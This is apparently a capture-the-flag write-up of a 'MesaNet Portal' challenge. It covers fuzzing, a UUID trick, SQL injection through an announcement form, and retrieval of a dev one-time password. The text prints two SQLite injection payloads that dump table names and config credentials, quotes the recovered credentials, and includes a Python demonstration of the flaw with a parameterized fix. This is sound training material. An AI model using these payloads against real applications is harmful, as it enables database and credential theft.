MesaNet Portal
This weekly was intense, super fun and came with the very useful hint ¯\_(ツ)_/¯
After exploring the app, I went through my proxy history, where I found that the functionality went through an endpoint, /gateway.

Well, if it was gonna be that easy, I would not have signed up for it, so I obviously tried reaching /admin.

Ok, maybe not so straightforward...

Ok maybe not so easy... 😂
Then I tried a UUID attack: essentially, the id is changed to all zeros.

Interesting finding! But what the hell is a Rail endpoint? I tried different things, but I always ended up with "Rail endpoint not found".

So I tried fuzzing it. I usually start fuzzing with common.txt from SecLists.

Got a hit, and creating stuff seems very fun to me if we're being honest.

Ok, I could create an announcement. But what now? Here I spent a good amount of time feeling lost, until I tried adding a ' to the message.

The only explanation was SQLi... So maybe...

Yes! With the payload ' || (SELECT group_concat(name) FROM sqlite_master WHERE type='table') || ' I was able to enumerate the tables. config was the table that caught my attention.

With ' || (SELECT group_concat(key || ':' || value) FROM config) || ' I was able to find some db credentials! dbadmin:Xen_Lambda_R4ilSyst3m_2024!Cr0ss1ng went straight to my notes. So I was looking for a database. I realized I hadn't gotten around to fuzzing the base app, so maybe this was a good moment for that.
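To make the two payloads above concrete, here is an added example (not the challenge's code, written for this writeup) that reproduces the string-concatenation bug against an in-memory SQLite database and shows why a lone ' errors, why the group_concat payloads dump sqlite_master and config, and how a bound parameter stops it. The table layout, the config rows (including the placeholder password) and the function names are assumptions for this example only.

```python
import sqlite3

# The two payloads from the writeup, as straight-quoted strings.
TABLES_PAYLOAD = "' || (SELECT group_concat(name) FROM sqlite_master WHERE type='table') || '"
CONFIG_PAYLOAD = "' || (SELECT group_concat(key || ':' || value) FROM config) || '"


def build_db():
    """Constructed in-memory stand-in for the portal's backend.
    Schema and config contents are assumptions, not the real challenge data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE announcements (id INTEGER PRIMARY KEY, message TEXT);
        CREATE TABLE config (key TEXT, value TEXT);
        INSERT INTO config VALUES ('db_user', 'dbadmin');
        INSERT INTO config VALUES ('db_pass', 'example-not-the-real-one');
        """
    )
    return conn


def create_announcement_vulnerable(conn, message):
    """Builds the INSERT by string concatenation, so a single quote in the
    message breaks out of the literal and the rest is parsed as SQL.
    Returns the message as stored, i.e. what the portal rendered back."""
    sql = f"INSERT INTO announcements (message) VALUES ('{message}')"
    conn.execute(sql)
    conn.commit()
    row = conn.execute(
        "SELECT message FROM announcements ORDER BY id DESC LIMIT 1"
    ).fetchone()
    return row[0]


def create_announcement_safe(conn, message):
    """Same feature with a bound parameter: the payload is stored verbatim
    and never reaches the SQL parser as code."""
    conn.execute("INSERT INTO announcements (message) VALUES (?)", (message,))
    conn.commit()
    row = conn.execute(
        "SELECT message FROM announcements ORDER BY id DESC LIMIT 1"
    ).fetchone()
    return row[0]


def probe_single_quote(conn):
    """The first test from the writeup: a lone ' is a syntax error on the
    vulnerable path (VALUES (''')) and plain text on the safe path."""
    try:
        create_announcement_vulnerable(conn, "'")
        vulnerable_errored = False
    except sqlite3.OperationalError:
        vulnerable_errored = True
    safe_stored = create_announcement_safe(conn, "'")
    return vulnerable_errored, safe_stored


if __name__ == "__main__":
    db = build_db()
    print("lone quote (errored?, stored safely):", probe_single_quote(db))
    print("tables :", create_announcement_vulnerable(db, TABLES_PAYLOAD))
    print("config :", create_announcement_vulnerable(db, CONFIG_PAYLOAD))
    print("safe   :", create_announcement_safe(db, TABLES_PAYLOAD))
```

The injected statement becomes VALUES ('' || (SELECT ...) || ''), which is why the subquery result ends up stored as the announcement text and echoed back: the message field itself is the output channel, so no UNION or error-based trick is needed. Note that group_concat's row order is not guaranteed by SQLite, so compare the enumerated names as a set rather than a fixed string.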

Well, look at that, a db and a dev environment. For funzies, let's check out the db.

Taking backups from a database? Don't mind if I do, but which one? Again, fuzzing is the answer!
Got a hit on portal and rail.

I downloaded portal and opened it in an online SQLite viewer. There I found an OTP (One Time Password) for a dev!

Well, we already found the /dev endpoint, so maybe it was time to go over there.

Apparently, the one-time code changed every minute! So I needed to be somewhat creative with my screens, because I hadn't hooked up my second monitor.

But eventually I was able to provide the correct password within the time frame and got my flag 🇧🇪